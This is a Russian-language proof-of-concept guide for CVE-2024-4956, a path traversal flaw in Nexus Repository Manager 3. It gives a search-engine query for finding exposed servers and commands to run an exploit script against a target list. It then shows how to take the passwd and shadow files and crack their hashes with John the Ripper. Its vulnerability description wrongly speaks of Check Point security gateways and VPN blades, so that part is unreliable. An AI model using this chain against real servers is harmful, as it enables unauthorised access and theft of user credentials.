
POC - CVE-2024–4956 - неавторизованный обход пути в Nexus Repository Manager 3
Потенциально позволяет злоумышленнику читать определенную информацию на шлюзах безопасности Check Point после подключения к Интернету и включения Remote Access VPN или Mobile Access Software Blades. Доступно исправление безопасности, устраняющее эту уязвимость.
Читать о нем — CVE-2024-4956
Отказ от ответственности: Данное доказательство концепции (POC) предназначено только для образовательных и этических целей тестирования. Использование этого инструмента для атаки на цели без предварительного взаимного согласия незаконно. Конечный пользователь обязан соблюдать все применимые местные, государственные и федеральные законы. Разработчики не несут никакой ответственности за любое неправильное использование или ущерб, причиненный этой программой.
Чтобы найти потенциальные цели, используйте Fofa (аналогично Shodan.io):
header="Server: Nexus/3.53.0-01 (OSS)"
Сначала клонируйте репозиторий:
git clone https://github.com/verylazytech/CVE-2024-4956
Затем выберите цель и добавьте ее в файл list.txt в этом формате:
Запустите эксплойт:
python3 CVE-2024-4956.py -l list.txt
Результат — найденные файлы passwd и shadow:

Теперь, после того как вы нашли оба файла passwd и shadow, вы можете попробовать взломать хэш с помощью JohnTheRipper. После запуска эксплойта у вас есть 2 файла: passwd и shadow, поэтому вы можете объединить их в один файл и попробовать взломать (я использовал rockyou.txt, но это может быть любой список паролей):
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt